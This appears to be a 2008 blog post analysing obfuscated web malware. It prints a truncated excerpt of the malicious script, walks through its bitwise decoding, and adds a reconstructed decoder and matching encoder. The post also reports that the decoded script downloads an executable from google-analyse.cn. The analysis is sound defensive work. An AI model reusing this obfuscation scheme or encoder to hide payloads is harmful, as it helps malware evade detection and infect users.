Monday, December 1, 2008

Web Based Malware Analysis

While working on a JavaScript malware analysis, I found these tools useful:
Rhino: http://www.mozilla.org/rhino/
Malzilla: http://malzilla.sourceforge.net/
Caffeine Monkey: http://www.mozilla.org/js/spidermonkey/
FreShow: http://www.jimmyleo.com/work/FreShowStart.htm
DecryptJS: http://www.ukhoneynet.org/tools/decrypt-js/


I came across this malicious JavaScript (excerpt; the BBB string and the loop body are truncated here):
AAA=Array(63/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,42/**/,0/**/,22/**/,32/**/,47/**/,40/**/,50/**/,56/**/,60/**/,11/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,54/**/,8/**/,27/**/,45/**/,43/**/,58/**/,41/**/,31/**/,26/**/,2/**/,4/**/,17/**/,59/**/,44/**/,20/**/,28/**/,18/**/,19/**/,16/**/,52/**/,46/**/,61/**/,33/**/,39/**/,15/**/,14/**/,9/**/,0/**/,0/**/,0/**/,0/**/,0/**/,0/**/,13/**/,23/**/,3/**/,25/**/,55/**/,10/**/,38/**/,62/**/,7/**/,24/**/,51/**/,29/**/,12/**/,5/**/,6/**/,35/**/,37/**/,48/**/,1/**/,36/**/,21/**/,57/**/,34/**/,53/**/,49/**/,30)
BBB="I7bHEVPGEK2a41oG8VWmWO6BWl@Btx2ZFd2HtnWO .. .. . . . . . ."
CCC=3536,DDD,EEE,FFF=''
YYY=ZZZ=XXX=0
for(EEE=4;EEE>0;EEE--)
{for(DDD=Math.min(CCC,1024);DDD>0;DDD--,CCC--)
{eval('XXX|=(AAA[BBB.charCodeAt(YYY++)-33])<<ZZZ;');

Here are my notes:
- The AAA array is the decoding key. If the attacker needs to change the code, he only has to swap this key, which helps with AV evasion.
- String.fromCha'+'rCode(8^XXX&255) is simply String.fromCharCode(8^XXX&255) with the name split by a string concatenation.
- BBB.charCodeAt(YYY++) returns the Unicode value of BBB character by character, starting from character 0 and taking up to 1024 characters per pass of the inner loop.
- Let us take the first part:
I7bHEVPGEK2a41oG8VWmWO6BWl@
Starting with position 0 and incrementing by 1:
I7bHEVPGEK2a41oG8VWmWO6BWl@ ==> 73 55 98 72 69 86 80 71 69 75 50 97 52 49 111 71 56 86 87 109 87 79 54 66 87 108 64
Deduct 33 from them all: 40 22 65 39 36 53 47 38 36 42 17 64 19 16 78 38 23 53 54 76 54 46 21 33 54 75 31
These are the indexes into AAA. So look at the overall expression:
'XXX|=(AAA[BBB.charCodeAt(YYY++)-33])<<ZZZ;'
"|" is bitwise OR, "<<" is shift left.
- The code uses bitwise OR and shift left for the encoding.
- There is an easier way to do this: use Malzilla and its debug feature.
- Finally the code tries to connect to google-analyse.cn and download a malicious executable file.
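As an added example (not code from the original post), here is an eval-free JavaScript re-implementation of the decoder described in the notes, run over the 27-character prefix quoted above. The loop body the post cuts off (advance ZZZ by 6 per symbol, flush a byte with String.fromCharCode(8^XXX&255) once 8 bits are buffered) is an assumption reconstructed from the notes, and the encode function, ALPHABET string and SYMBOL_TO_CHAR table are my own constructions used to round-trip test the decoder.

```javascript
// Key table copied from the post: index = char code - 33, value = 6-bit symbol.
const AAA = [63,0,0,0,0,0,0,0,0,0,0,0,0,0,0,42,0,22,32,47,40,50,56,60,11,0,0,0,0,0,0,54,8,27,45,43,58,41,31,26,2,4,17,59,44,20,28,18,19,16,52,46,61,33,39,15,14,9,0,0,0,0,0,0,13,23,3,25,55,10,38,62,7,24,51,29,12,5,6,35,37,48,1,36,21,57,34,53,49,30];
// The 27 characters of BBB quoted in the post (the full string is not on the page).
const BBB_PREFIX = "I7bHEVPGEK2a41oG8VWmWO6BWl@";

// Eval-free decoder using the same bit operations as the malware's eval'd string.
// ASSUMPTION: the loop body the post cuts off advances ZZZ by 6 per symbol and
// flushes a byte via String.fromCharCode(8^XXX&255) once 8 bits are buffered.
function decode(encoded, table = AAA) {
  let XXX = 0, ZZZ = 0, out = "";
  for (let YYY = 0; YYY < encoded.length; YYY++) {
    const idx = encoded.charCodeAt(YYY) - 33;
    if (idx < 0 || idx >= table.length) throw new Error("character outside key table at " + YYY);
    XXX |= table[idx] << ZZZ;   // OR the next 6-bit symbol into the bit buffer
    ZZZ += 6;
    if (ZZZ >= 8) {             // a whole byte is available: un-XOR and emit it
      out += String.fromCharCode(8 ^ (XXX & 255));   // & binds tighter than ^
      XXX >>>= 8;
      ZZZ -= 8;
    }
  }
  return out;
}

// Inverse table: 6-bit value -> character. Only these 64 characters
// ('!', '0'-'9', '@', 'A'-'Z', 'a'-'z') are real alphabet members; the other
// zeros in AAA are filler for punctuation that never appears in BBB.
const ALPHABET = "!0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
const SYMBOL_TO_CHAR = [];
for (const ch of ALPHABET) SYMBOL_TO_CHAR[AAA[ch.charCodeAt(0) - 33]] = ch;

// Encoder (my own construction, used to test the decoder): XOR each byte with 8,
// then pack the bits low-order first into 6-bit symbols. Latin-1 input only.
function encode(plain) {
  let acc = 0, nbits = 0, out = "";
  for (let i = 0; i < plain.length; i++) {
    acc |= (plain.charCodeAt(i) ^ 8) << nbits;
    nbits += 8;
    while (nbits >= 6) {
      out += SYMBOL_TO_CHAR[acc & 63];
      acc >>>= 6;
      nbits -= 6;
    }
  }
  if (nbits > 0) out += SYMBOL_TO_CHAR[acc & 63];   // trailing partial symbol
  return out;
}
console.log(JSON.stringify(decode(BBB_PREFIX)));    // the payload starts with a URL
```

Decoding the quoted prefix with this reconstruction yields the beginning of a script line assigning a URL, consistent with the note about the connection to google-analyse.cn.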


References:
http://rishida.net/scripts/uniview/conversion.php
http://www.eecs.umich.edu/~bartlett/jsops.html
http://doc.sumy.ua/prog/jsm/ch13.htm#BitwiseOROperator
http://www.ukhoneynet.org/wp-content/uploads/2007/08/decryptjs.tgz
